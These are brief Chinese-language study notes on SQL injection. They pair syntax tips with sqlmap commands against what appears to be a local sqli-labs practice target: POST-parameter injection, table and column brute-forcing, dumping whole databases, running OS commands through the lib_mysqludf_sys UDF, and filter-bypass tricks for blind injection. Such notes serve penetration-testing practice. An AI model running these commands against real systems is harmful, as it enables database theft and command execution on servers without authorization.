1.limit从0开始排序,substr从1开始排序。
2.mysql和sql server注入时候的区别
3.group_concat:
group_concat( [distinct] 要连接的字段 [order by 排序字段 asc/desc ] [separator '分隔符'] )
四.sqlmap语句集
a)POST登陆方式
1.通过 -U 指定对象 / -p 指定参数
sqlmap -r "/root/Desktop/11.txt" --batch -p "uname" --privileges -U root
2.-data 指定参数值
sqlmap -u "http://192.168.0.108:8009/sqli/Less-13/" --data="uname=123&passwd=123&submit=Submit" -p uname
3.暴力解表
sqlmap -u "http://192.168.0.108:8009/sqli/Less-14/" --data="uname=123&passwd=123&submit=Submit" --skip="uname" --batch -D security --dbms=mysql --common-tables
4.暴力解列
sqlmap -u "http://192.168.0.108:8009/sqli/Less-14/" --data="uname=123&passwd=123&submit=Submit" --skip="uname" --batch -D security --dbms=mysql -T users --common-columns
5.获取所有
sqlmap -u "http://192.168.0.108:8009/sqli/Less-14/" --data="uname=123&passwd=123&submit=Submit" --skip="uname" --batch -D security --dbms=mysql --dump-all
6.UDF(用户自定义)命令执行
通过 lib_mysqludf_sys提供的几个函数,【sys_eval()\sys_exec()】
攻击者将 lib_mysqludf_sys上传到数据库访问的路径下,使用 sys_eval()执行系统命令。
即为sqlmap
sqlmap -u "xxx" --os-cmd id -v 1
7.代替
= ------regexp
判断是否过滤:可以用异或 ^length(‘and’!=0) 来进行判断。
ip是被过滤掉逗号的,所以我们延时盲注时不能用if语句。
只能用case when then else end 代替